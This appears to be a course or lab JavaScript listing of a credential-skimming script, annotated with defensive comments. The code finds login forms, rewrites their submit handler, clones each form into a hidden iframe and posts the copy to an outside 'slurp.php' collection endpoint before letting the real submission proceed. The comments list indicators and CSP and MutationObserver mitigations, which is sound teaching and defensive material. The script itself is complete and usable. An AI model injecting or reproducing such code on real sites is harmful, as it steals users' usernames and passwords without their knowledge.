// Top-level driver: collects every <form> element in the document and hands
// each one to hijack() for inspection.
// Defensive relevance: code like this has to execute inside the page that owns
// the forms, so restricting script origins with a Content-Security-Policy
// `script-src` directive limits where it can be loaded from.
- var frms = document.getElementsByTagName("form");
- for(i=0; i<frms.length; i++) {
- hijack(frms.item(i));
- }
// hijack(frmObj): decides whether a form looks like a login form and, if so,
// replaces its inline onsubmit attribute with a call to leech().
//   frmObj - a <form> element taken from the document.
// Returns nothing; the only effect is the attribute rewrite (plus an alert).
// Detection/mitigation: the rewrite is an inline event-handler attribute set at
// runtime, so a CSP whose `script-src` omits 'unsafe-inline' prevents the
// handler from running, and a MutationObserver watching form attributes will
// see an `onsubmit` value the application did not ship.
- function hijack(frmObj) {
- var hasUsername = false;
- var hasPassword = false;
// Heuristic scan of the form's <input> elements: a field whose id or name
// mentions 'user', together with a field whose type mentions 'password'.
- for (i of frmObj.getElementsByTagName('input')) {
- hasUsername = hasUsername || i.getAttribute('id').contains('user') || i.getAttribute('name').contains('user');
- hasPassword = hasPassword || i.getAttribute('type').contains('password');
- }
- if (hasUsername && hasPassword) {
// Visible dialog on every matched form; looks like leftover debugging output.
- alert("FOUND ONE");
// Any existing inline onsubmit text is kept so it can be wrapped in a function
// and passed to leech() as its second argument.
- var delayCode = "";
- if(frmObj.hasAttribute("onsubmit")) {
- delayCode = frmObj.getAttribute("onsubmit");}
// After this line, submitting the form calls leech(this, <wrapped old handler>)
// and the form's submit is governed by leech()'s return value.
- frmObj.setAttribute("onsubmit", "return leech(this,function(){" + delayCode + "});");
- }
- }
// leech(frmObj, delayCode): submit-time handler installed by hijack().
//   frmObj    - the form being submitted.
//   delayCode - function wrapping the form's previous inline onsubmit text.
// Always returns false, which cancels the submit that triggered it; the
// original form is re-submitted from the timer below.
// Indicators visible in this listing: an added input named "442team" with value
// "TeamAlpha", form ids prefixed "leechedID", iframe names prefixed
// "hiddenframe", and the hard-coded action URL below.
// Mitigation: a CSP `form-action` directive that lists only the site's own
// endpoints blocks a form submission to an unrelated origin like this one.
- /** Copies and submits a form object’s complete contents */
- function leech(frmObj, delayCode) {
// Integer in 0..255, used only to make the clone's id and the iframe name vary.
- var rnd = Math.floor(Math.random()*256);
- var newFrm = frmObj.cloneNode(true); //deep clone
// Marker field appended to the copy (not to the original form).
- var elt = document.createElement("input");
- elt.setAttribute("name", "442team");
- elt.setAttribute("value", "TeamAlpha");
- newFrm.appendChild(elt);
- newFrm.setAttribute("id", "leechedID" + rnd);
// The target matches the name given to the iframe created below, presumably so
// the response loads there instead of navigating the visible page.
- newFrm.setAttribute("target", "hiddenframe" + newFrm.id);
// The copy is pointed at a third-party collection endpoint instead of the
// form's own action.
- newFrm.setAttribute("action", "https://www.rose-hulman.edu/~stammsl/442/slurp.php");
// Iframe styled with visibility:hidden; it holds the cloned form as a child.
- var hiddenIframe = document.createElement("iframe");
- hiddenIframe.setAttribute("style", "position:absolute;" + "visibility:hidden;z-index:0;");
- hiddenIframe.setAttribute("name", "hiddenframe" + newFrm.id);
- hiddenIframe.appendChild(newFrm);
- window.document.body.appendChild(hiddenIframe);
// The copy is submitted first; the user's own submit is held back.
- newFrm.submit();
// 50 ms later: remove the iframe, run the wrapped original handler, and submit
// the original form unless that handler returned false.
- setTimeout(function() {
- window.document.body.removeChild(hiddenIframe);
- if(delayCode() != false) { frmObj.submit(); }
- }, 50);
- return false;
- }